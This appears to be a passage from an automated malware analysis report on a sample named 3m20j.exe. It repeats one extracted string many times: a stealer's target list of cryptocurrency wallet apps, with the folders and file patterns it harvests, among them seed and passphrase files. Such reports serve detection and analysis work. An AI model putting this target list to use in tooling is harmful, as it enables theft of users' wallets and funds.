                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
